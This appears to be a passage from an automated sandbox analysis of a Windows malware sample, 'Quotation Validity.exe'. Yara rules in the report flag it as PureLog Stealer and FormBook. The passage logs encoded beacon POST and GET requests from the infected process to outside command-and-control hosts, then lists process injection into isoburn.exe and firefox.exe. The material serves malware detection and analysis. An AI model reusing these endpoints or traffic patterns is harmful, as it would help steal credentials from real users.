                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:46:15.872236013 CET1668OUTPOST /dm4p/ HTTP/1.1
                                                                              Host: www.dietcoffee.online
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.dietcoffee.online
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.dietcoffee.online/dm4p/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 71 43 4f 44 55 31 45 62 77 6e 68 67 34 7a 69 6e 4a 6d 52 53 49 42 7a 32 37 33 46 67 6f 4c 76 69 36 6c 57 66 55 56 36 77 30 51 4d 5a 68 44 71 51 6c 75 62 6e 61 71 33 32 2f 66 2f 32 51 2f 61 2b 52 6e 51 74 36 72 6e 33 79 39 41 71 78 78 51 43 6a 42 30 6b 69 30 4c 35 68 4e 74 2f 44 33 34 4e 4a 4a 75 6b 38 4d 4d 38 61 66 50 35 31 64 61 6f 61 73 45 51 54 58 69 72 2b 43 30 36 6d 38 36 31 69 39 6c 42 55 4b 65 56 77 4c 56 4a 4e 37 63 57 2b 5a 38 4a 4d 6c 50 75 47 34 48 64 2b 34 71 30 73 45 49 56 43 4b 63 37 72 73 46 4d 5a 49 42 38 76 34 6d 70 32 6d 79 42 75 4d 34 43 48 4e 49 56 51 74 72 66 32 72 49 66 68 58 4a 70 51 6f 45 53 58 59 6e 34 36 75 53 6c 70 64 4c 46 6a 4b 56 68 44 41 6f 34 43 30 6e 72 31 45 32 49 7a 7a 2f 72 71 6a 44 35 68 4a 61 73 48 71 6f 52 41 31 35 50 67 56 72 61 57 32 5a 66 58 51 67 7a 63 6f 6d 75 64 5a 38 66 76 48 72 4e 36 4b 41 63 4d 69 6d 34 57 50 4d 6d 78 75 63 57 38 41 31 75 44 73 76 78 4a 45 58 37 50 65 4c 32 68 79 4d 6b 64 43 6a 7a 41 78 64 49 54 38 78 43 67 46 [TRUNCATED]
                                                                              Data Ascii: 6NVpdLF=qCODU1Ebwnhg4zinJmRSIBz273FgoLvi6lWfUV6w0QMZhDqQlubnaq32/f/2Q/a+RnQt6rn3y9AqxxQCjB0ki0L5hNt/D34NJJuk8MM8afP51daoasEQTXir+C06m861i9lBUKeVwLVJN7cW+Z8JMlPuG4Hd+4q0sEIVCKc7rsFMZIB8v4mp2myBuM4CHNIVQtrf2rIfhXJpQoESXYn46uSlpdLFjKVhDAo4C0nr1E2Izz/rqjD5hJasHqoRA15PgVraW2ZfXQgzcomudZ8fvHrN6KAcMim4WPMmxucW8A1uDsvxJEX7PeL2hyMkdCjzAxdIT8xCgFSzSENwCTpLQhyXgKoxxGrkRQQ/jVJ6JRxf43VAEfTfKC0RFXAVFuTj93gRS6sMoxXP4O9dCfGB+PEW7g/FkuGkqZj6vG/v1FC0yHJrZWm8zOlGmTwR4+SBwUQCJBG1XdUI5zEAeBepdCEWEUaYUG3wkjPzuAwOhQm/ThIHNA9ooVLrbr+oshVBDJMZO9UiyLAcZ3tiqVZrpIev2SRiZOZq9j0xtrDZ1uiGg7MwKAHxWNJfYYLeGlFoPBrfoiSjFnyuAKs2+qTVeO/LsVmgCCG0t3ETnBa5EqtZkVOw1VFVO+xV2zuT4yF7YQfZLlhTO0V4w2gVWtNI+zay4zbQlppiNRB7YHykKBeGzu0dsYJT6DqpFtSYdRQkq2ET8ZXuFh4BXAhMsKABxQyOapweOVken6ap/8PWfW/FFrot2605lrXiwBlT5moqtrdUXDN+49mD9ODbU8l+JE4nsDreGqW1ZL9zgvceK7N3sG1mFzVODllhvzQWyUOOfeJ9GzRtXAz4yuj0dTWhZG2SIccac5toPelfOPKPs78g56U1AT8H2g6LODBdooz6/6uAjrOcIOCGak87qenHD7BvmJlsLxzcYTTYtFl1dQqgSg6TdSqXacBpjkhGzMCOTjASd6nVvve+wInR/ifQ/sYDis6NCraJ/P0wVfl/xiHs [TRUNCATED]
                                                                              Dec 2, 2024 14:46:17.134747982 CET391INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.25.3
                                                                              Date: Mon, 02 Dec 2024 13:46:16 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Transfer-Encoding: chunked
                                                                              Connection: close
                                                                              Content-Encoding: gzip
                                                                              Data Raw: 62 33 0d 0a 1f 8b 08 00 00 00 00 00 04 03 4d 8e cd 0e 82 30 10 84 ef 3c c5 ca 5d 16 0d c7 4d 0f f2 13 49 10 89 29 07 8f 98 d6 94 04 28 d2 a2 f1 ed 2d 70 f1 38 3b 33 df 2c ed 92 6b cc ef 55 0a 67 7e 29 a0 aa 4f 45 1e 83 bf 47 cc 53 9e 21 26 3c d9 9c 63 10 22 a6 a5 cf 3c 52 b6 ef 18 29 d9 08 27 6c 6b 3b c9 a2 30 82 52 5b c8 f4 3c 08 c2 ed e8 11 ae 21 7a 68 f1 5d 7a 07 f6 97 71 ca a3 91 71 25 61 92 af 59 1a 2b 05 d4 b7 02 50 f4 d1 88 f0 69 0c 0c 0e f9 5c 90 a0 07 b0 aa 35 60 e4 f4 96 53 40 38 ba 36 ae 60 b7 b2 3c e4 fd 00 14 26 9a 9b cb 00 00 00 0d 0a 30 0d 0a 0d 0a
                                                                              Data Ascii: b3M0<]MI)(-p8;3,kUg~)OEGS!&<c"<R)'lk;0R[<!zh]zqq%aY+Pi\5`S@86`<&0


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.105001777.68.64.45806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:46:18.535096884 CET360OUTGET /dm4p/?6NVpdLF=nAmjXBwFyC120iWFa15+GTz1nnoe6LyW/X6vA0SQviJnmQOR7pbzII6Li/fXSuLSC3cdwp3L3c1awzkuuw4AzFSQlsxYI3pCP4WG49cxd9TY9P6nbg==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.dietcoffee.online
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:46:19.758452892 CET373INHTTP/1.1 404 Not Found
                                                                              Server: nginx/1.25.3
                                                                              Date: Mon, 02 Dec 2024 13:46:19 GMT
                                                                              Content-Type: text/html; charset=iso-8859-1
                                                                              Content-Length: 203
                                                                              Connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 64 6d 34 70 2f 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /dm4p/ was not found on this server.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.1050018146.88.233.115806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:46:26.151315928 CET631OUTPOST /qtfx/ HTTP/1.1
                                                                              Host: www.smartcongress.net
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.smartcongress.net
                                                                              Content-Length: 196
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.smartcongress.net/qtfx/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 48 66 6c 45 38 6c 2b 2b 76 34 34 48 74 4b 51 7a 7a 35 2b 2f 7a 47 4b 54 7a 79 69 58 61 43 6a 56 36 42 4a 4d 70 73 44 56 30 4d 6d 31 73 6d 46 71 38 6a 6d 49 6b 4a 4a 74 59 44 6a 47 4d 58 36 72 71 73 32 77 43 72 5a 56 57 70 70 42 77 6f 68 6a 78 6f 4f 76 48 30 36 65 66 6a 75 33 4a 45 39 68 4f 57 35 70 66 39 45 6d 69 31 64 48 32 56 4f 6c 6c 39 56 71 67 6a 58 52 72 63 58 71 64 76 32 73 74 4b 6c 30 76 6c 32 67 57 43 35 72 62 70 43 52 59 6b 33 35 4f 6a 2b 35 45 48 35 34 4f 49 38 34 35 34 39 4b 5a 50 67 61 4d 56 65 43 41 56 35 51 57 41 79 71 32 72 46 75 4d 56 61 67
                                                                              Data Ascii: 6NVpdLF=HflE8l++v44HtKQzz5+/zGKTzyiXaCjV6BJMpsDV0Mm1smFq8jmIkJJtYDjGMX6rqs2wCrZVWppBwohjxoOvH06efju3JE9hOW5pf9Emi1dH2VOll9VqgjXRrcXqdv2stKl0vl2gWC5rbpCRYk35Oj+5EH54OI84549KZPgaMVeCAV5QWAyq2rFuMVag
                                                                              Dec 2, 2024 14:46:27.683649063 CET380INHTTP/1.1 404 Not Found
                                                                              content-type: text/html; charset=iso-8859-1
                                                                              content-length: 196
                                                                              date: Mon, 02 Dec 2024 13:46:27 GMT
                                                                              server: LiteSpeed
                                                                              x-tuned-by: N0C
                                                                              connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              42192.168.2.1050019146.88.233.115806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:46:28.828331947 CET655OUTPOST /qtfx/ HTTP/1.1
                                                                              Host: www.smartcongress.net
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.smartcongress.net
                                                                              Content-Length: 220
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.smartcongress.net/qtfx/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 48 66 6c 45 38 6c 2b 2b 76 34 34 48 2f 37 67 7a 30 65 53 2f 79 6d 4b 53 2f 53 69 58 4e 53 69 63 36 42 31 4d 70 6f 53 4b 30 2b 79 31 74 48 31 71 2f 6d 53 49 6e 4a 4a 74 51 6a 69 43 54 48 36 61 71 73 71 4f 43 72 6c 56 57 70 39 42 77 70 52 6a 79 66 53 73 64 45 36 51 53 44 75 69 57 55 39 68 4f 57 35 70 66 39 68 75 69 32 74 48 32 45 65 6c 6a 70 42 74 70 44 58 53 39 4d 58 71 5a 76 32 67 74 4b 6c 43 76 6e 54 48 57 45 39 72 62 70 79 52 62 31 33 34 5a 54 2b 2f 61 33 34 6e 4f 4b 74 4f 6a 34 52 70 62 4d 64 58 53 30 53 5a 4f 55 45 58 48 52 54 39 6c 63 5a 67 43 54 76 4b 52 66 55 53 67 41 64 62 6c 6d 33 73 63 2f 45 6c 35 41 5a 70 36 67 3d 3d
                                                                              Data Ascii: 6NVpdLF=HflE8l++v44H/7gz0eS/ymKS/SiXNSic6B1MpoSK0+y1tH1q/mSInJJtQjiCTH6aqsqOCrlVWp9BwpRjyfSsdE6QSDuiWU9hOW5pf9hui2tH2EeljpBtpDXS9MXqZv2gtKlCvnTHWE9rbpyRb134ZT+/a34nOKtOj4RpbMdXS0SZOUEXHRT9lcZgCTvKRfUSgAdblm3sc/El5AZp6g==
                                                                              Dec 2, 2024 14:46:30.360930920 CET380INHTTP/1.1 404 Not Found
                                                                              content-type: text/html; charset=iso-8859-1
                                                                              content-length: 196
                                                                              date: Mon, 02 Dec 2024 13:46:29 GMT
                                                                              server: LiteSpeed
                                                                              x-tuned-by: N0C
                                                                              connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              43192.168.2.1050020146.88.233.115806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:46:31.489902020 CET1668OUTPOST /qtfx/ HTTP/1.1
                                                                              Host: www.smartcongress.net
                                                                              Accept: */*
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-us
                                                                              Origin: http://www.smartcongress.net
                                                                              Content-Length: 1232
                                                                              Connection: close
                                                                              Cache-Control: no-cache
                                                                              Content-Type: application/x-www-form-urlencoded
                                                                              Referer: http://www.smartcongress.net/qtfx/
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Data Raw: 36 4e 56 70 64 4c 46 3d 48 66 6c 45 38 6c 2b 2b 76 34 34 48 2f 37 67 7a 30 65 53 2f 79 6d 4b 53 2f 53 69 58 4e 53 69 63 36 42 31 4d 70 6f 53 4b 30 2b 71 31 74 31 39 71 38 46 36 49 6d 4a 4a 74 61 44 69 50 54 48 36 39 71 73 79 53 43 72 70 6a 57 71 46 42 32 37 70 6a 36 4f 53 73 49 55 36 51 4f 7a 76 46 4a 45 39 77 4f 58 56 6c 66 39 78 75 69 32 74 48 32 48 57 6c 79 39 56 74 72 44 58 52 72 63 58 63 64 76 33 2f 74 4b 74 53 76 6e 57 77 56 30 64 72 62 4e 57 52 64 48 76 34 62 7a 2b 39 62 33 34 76 4f 4b 68 64 6a 34 39 6c 62 4e 6f 36 53 31 6d 5a 4d 78 5a 6a 51 79 7a 61 34 50 31 31 46 31 6e 64 52 50 41 69 6c 6a 41 2b 71 56 37 54 4d 4c 64 43 2f 41 49 41 6d 37 37 6b 75 77 35 36 44 61 67 47 66 62 51 79 4c 36 43 2f 78 69 30 76 79 31 6d 30 2f 64 58 6d 37 44 34 54 65 4e 71 47 62 43 6f 33 6b 4f 42 2b 42 49 53 6a 50 76 31 73 68 31 5a 34 52 61 66 6e 58 48 72 42 72 61 58 62 34 69 72 36 57 32 4b 32 6e 43 74 47 6d 67 45 43 49 64 43 42 79 30 33 4c 66 51 2b 37 42 59 75 4d 44 79 2b 4f 35 46 56 78 42 55 34 77 55 71 35 78 6b 39 [TRUNCATED]
                                                                              Data Ascii: 6NVpdLF=HflE8l++v44H/7gz0eS/ymKS/SiXNSic6B1MpoSK0+q1t19q8F6ImJJtaDiPTH69qsySCrpjWqFB27pj6OSsIU6QOzvFJE9wOXVlf9xui2tH2HWly9VtrDXRrcXcdv3/tKtSvnWwV0drbNWRdHv4bz+9b34vOKhdj49lbNo6S1mZMxZjQyza4P11F1ndRPAiljA+qV7TMLdC/AIAm77kuw56DagGfbQyL6C/xi0vy1m0/dXm7D4TeNqGbCo3kOB+BISjPv1sh1Z4RafnXHrBraXb4ir6W2K2nCtGmgECIdCBy03LfQ+7BYuMDy+O5FVxBU4wUq5xk9J9YeZRkduX8Y9O53CwcPuZ/xAEu2ahG7BOUDGRz1H4ftxGX3mTF1lxw04sERiVFqfKwZuEsms4LH5oMxOWIPt0/ZfJdR8bQg1MMIhVCJjyZ9YHr2jroAulEsb1LkxmvGLgUR2hJeJESUHZEPhttu7qBFs6cL2Y+pj8YZvCf2dsF4BF+o9fWTxhi/IU7BHZaiROI3qof6XgfLHLFH/poXfGbzwzjXvKqL9LX2fLSW36UmqPp5lhym+vDNFSp/Xkprrde473OhjH8Tk+VBNbXuMuvvlSfzxLNLWy9iOnJiWlt/zt8IYo2BWQoSf5KNa5PIR7u8FI4Ut/aqH4bsqRvJkmtY9Ea2MFZ3baeHWmI5i35+bbpBkzkLT8jMbfSSeVhWCxyVFXh5I6w6X7nK9HJ9ht4U++MJg6W/zHagT61wzYHCx4kpZy/QdU8JFM5wDwZe83MbjsZP//+V8SQbW9v62Tq8oPx2yBm3SxhU/WZd4epZvaLeSc3vAWyOCYDIW2af7VAJe/ItOsFJV7C4UNATBaNUP4SsiCScuXAxAjkJunGXwB6binOhZJsIDCTvb1P0VvZALQhFgpf8KcZUWjh5jruvYLFvDm4Ji68F/eJfQ8kruLjjYIjXElq9lZ6wcpugx6pBo9oLtCY0przh2CpqJlCIT/pzTMEuwf [TRUNCATED]
                                                                              Dec 2, 2024 14:46:32.971956015 CET380INHTTP/1.1 404 Not Found
                                                                              content-type: text/html; charset=iso-8859-1
                                                                              content-length: 196
                                                                              date: Mon, 02 Dec 2024 13:46:32 GMT
                                                                              server: LiteSpeed
                                                                              x-tuned-by: N0C
                                                                              connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              44192.168.2.1050021146.88.233.115806680C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              Dec 2, 2024 14:46:34.213931084 CET360OUTGET /qtfx/?6NVpdLF=KdNk/QG/ntQJ0Ylui7yy1ELkvwiUPibsxCMWqIa/89W9m0NHjjmW45E2UxezVHfL5+2nDpZVQ4VEoa9MycOLKl2XaG/4RF1XL2skPecvq2g7m0aOng==&_jVx=rlV0_TQ81 HTTP/1.1
                                                                              Host: www.smartcongress.net
                                                                              Accept: */*
                                                                              Accept-Language: en-us
                                                                              Connection: close
                                                                              User-Agent: Mozilla/5.0 (X11; Linux) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.141 Safari/537.36
                                                                              Dec 2, 2024 14:46:35.485975027 CET380INHTTP/1.1 404 Not Found
                                                                              content-type: text/html; charset=iso-8859-1
                                                                              content-length: 196
                                                                              date: Mon, 02 Dec 2024 13:46:35 GMT
                                                                              server: LiteSpeed
                                                                              x-tuned-by: N0C
                                                                              connection: close
                                                                              Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                              Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                              Statistics

                                                                              CPU Usage

                                                                              Click to jump to process

                                                                              Memory Usage

                                                                              Click to jump to process

                                                                              High Level Behavior Distribution

                                                                              Click to dive into process behavior distribution

                                                                              Behavior

                                                                              Click to jump to process

                                                                              System Behavior

                                                                              General

                                                                              Target ID:2
                                                                              Start time:08:42:37
                                                                              Start date:02/12/2024
                                                                              Path:C:\Users\user\Desktop\Quotation Validity.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Quotation Validity.exe"
                                                                              Imagebase:0xee0000
                                                                              File size:919'040 bytes
                                                                              MD5 hash:10F86C0378F3F9EABAE2129174962DF1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.1306858110.0000000005E70000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.1304383936.0000000004419000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 00000002.00000002.1302792187.000000000345F000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:9
                                                                              Start time:08:42:40
                                                                              Start date:02/12/2024
                                                                              Path:C:\Users\user\Desktop\Quotation Validity.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Users\user\Desktop\Quotation Validity.exe"
                                                                              Imagebase:0x890000
                                                                              File size:919'040 bytes
                                                                              MD5 hash:10F86C0378F3F9EABAE2129174962DF1
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1713438377.0000000003BC0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1698550308.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000009.00000002.1704236127.00000000016E0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:low
                                                                              Has exited:true

                                                                              General

                                                                              Target ID:11
                                                                              Start time:08:43:12
                                                                              Start date:02/12/2024
                                                                              Path:C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe"
                                                                              Imagebase:0x560000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000B.00000002.3732187285.0000000002910000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:12
                                                                              Start time:08:43:14
                                                                              Start date:02/12/2024
                                                                              Path:C:\Windows\SysWOW64\isoburn.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Windows\SysWOW64\isoburn.exe"
                                                                              Imagebase:0xa20000
                                                                              File size:107'008 bytes
                                                                              MD5 hash:BF19DD525C7D23CAFC086E9CCB9C06C6
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3724879473.0000000002A40000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3729826562.0000000002F50000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000C.00000002.3732445014.0000000004AD0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:moderate
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:13
                                                                              Start time:08:43:27
                                                                              Start date:02/12/2024
                                                                              Path:C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe
                                                                              Wow64 process (32bit):true
                                                                              Commandline:"C:\Program Files (x86)\DnvOGaMCZRZZXNQYAfmZUuciZoXmMHbNGtRahnwRtFoNZMGxE\KnETAajUsFuuTQ.exe"
                                                                              Imagebase:0x560000
                                                                              File size:140'800 bytes
                                                                              MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                                              Has elevated privileges:false
                                                                              Has administrator privileges:false
                                                                              Programmed in:C, C++ or other language
                                                                              Yara matches:
                                                                              • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 0000000D.00000002.3734770459.0000000004C70000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              General

                                                                              Target ID:17
                                                                              Start time:08:43:40
                                                                              Start date:02/12/2024
                                                                              Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                                              Wow64 process (32bit):false
